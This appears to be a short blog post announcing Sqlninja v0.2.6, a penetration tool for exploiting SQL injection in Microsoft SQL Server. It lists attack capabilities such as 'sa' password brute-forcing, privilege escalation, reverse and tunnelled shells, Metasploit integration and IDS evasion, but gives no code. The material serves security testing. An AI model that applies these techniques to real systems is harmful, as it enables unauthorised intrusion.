- Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB Server authentication mode)
- Bruteforce of the 'sa' password
- Privilege escalation to 'sa'
- Creation of a custom xp_cmdshell if the original one has been disabled
- Upload of executables
- Reverse scan in order to look for a port that can be used for a reverse shell
- Direct and reverse shell, both TCP and UDP
- DNS tunneled pseudoshell, when no ports are available for a bindshell
- ICMP tunneled shell, if the target DBMS can communicate via ICMP Echo with the attacking machine
- Metasploit wrapping, when you want to use Meterpreter or even want to get GUI access on the remote DB server
- OS privilege escalation on the remote DB server using token kidnapping or through CVE-2010-0232
- All of the above can be done with obfuscated SQL code, in order to confuse IDS/IPS systems
Sqlninja v.0.2.6 Released
Sqlninja's goal is to exploit SQL injection vulnerabilities on web applications that use Microsoft SQL Server as back end.There are a lot of other SQL injection tools out there but sqlninja, instead of extracting the data, focuses on getting an interactive shell on the remote DB server and using it as a foothold in the target network. In a nutshell, here's what it does:
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment
mohon saran dan komentar teman² semua